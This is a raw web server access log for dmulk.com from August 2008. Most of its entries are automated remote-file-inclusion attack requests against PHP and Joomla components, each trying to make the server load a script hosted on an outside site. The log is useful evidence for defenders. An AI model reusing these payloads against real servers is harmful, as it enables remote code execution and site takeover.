74.6.17.183 - - [12/Aug/2008:11:31:21 -0700] "GET /logs/access_080226.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:31:23 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:31:24 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:31:25 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:31:29 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:31:29 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:31:29 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:31:29 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:31:30 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:31:30 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:31:30 -0700] "GET /logs/access_080303.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:31:32 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:31:33 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:31:46 -0700] "GET /logs/access_080229.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:31:46 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:31:47 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:31:47 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.26 - - [12/Aug/2008:11:31:55 -0700] "GET /logs/access_080708.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:31:59 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:32:00 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:32:00 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:32:15 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:32:15 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:32:23 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:32:24 -0700] "GET //config.php?path_to_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:32:25 -0700] "GET /logs//config.php?path_to_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:32:28 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:11:32:31 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:11:32:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:32:41 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:32:41 -0700] "GET /convert/mvcw.php?vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:32:41 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:32:48 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:32:51 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:32:59 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:33:03 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:33:04 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:33:08 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:33:08 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.183.76 - - [12/Aug/2008:11:33:19 -0700] "GET /?path[docroot]=http://vobucks.com/bo.do?? HTTP/1.1" 200 18379 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
59.125.183.76 - - [12/Aug/2008:11:33:19 -0700] "GET /logs/?path[docroot]=http://vobucks.com/bo.do?? HTTP/1.1" 200 60283 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:33:21 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18555 "-" "libwww-perl/5.76" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:33:37 -0700] "GET /logs/access_080227.log//galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:33:37 -0700] "GET //galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:33:37 -0700] "GET /logs//galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:11:33:46 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/?D=A HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:33:49 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:33:50 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:33:57 -0700] "GET /logs/access_080303.log//galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:34:00 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:34:02 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:34:03 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:15 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:16 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:34:16 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:34:17 -0700] "GET /logs/access_080227.log//galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:34:18 -0700] "GET //galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:34:18 -0700] "GET /logs//galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:34:21 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:34:21 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:34:22 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:24 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:24 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:25 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:34:30 -0700] "GET /logs/access_080303.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:34:35 -0700] "GET /logs/access_080303.log//galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:34:39 -0700] "GET /logs/access_071226.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:34:39 -0700] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:34:39 -0700] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:34:40 -0700] "GET /logs/access_080216.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:34:41 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:34:41 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:34:42 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:51 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:51 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:34:56 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:56 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:56 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:56 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:57 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:58 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:58 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:58 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:34:58 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:58 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:58 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:58 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:34:59 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:59 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:34:59 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:35:00 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:35:00 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:35:00 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:35:20 -0700] "GET /logs/access_080118.log//artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:35:20 -0700] "GET //artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:35:21 -0700] "GET /logs//artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.202.22.173 - - [12/Aug/2008:11:35:35 -0700] "GET //components/com_simpleboard/image_upload.php?sbphttp://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:35:36 -0700] "GET /logs/config.php?path_to_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [12/Aug/2008:11:35:37 -0700] "GET /config.php?path_to_root=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:35:38 -0700] "GET /logs/access_080118.log//artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:35:38 -0700] "GET //artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:11:35:39 -0700] "GET /logs//artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.37.125 - - [12/Aug/2008:11:35:41 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/feed/ HTTP/1.0" 200 677 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:35:46 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:35:46 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:35:46 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:35:47 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.71.130 - - [12/Aug/2008:11:35:52 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
124.0.71.130 - - [12/Aug/2008:11:35:52 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
124.0.71.130 - - [12/Aug/2008:11:35:52 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:35:55 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18565 "-" "libwww-perl/5.76" "www.dmulk.com"
118.45.190.171 - - [12/Aug/2008:11:35:56 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
118.45.190.171 - - [12/Aug/2008:11:35:56 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
118.45.190.171 - - [12/Aug/2008:11:35:56 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/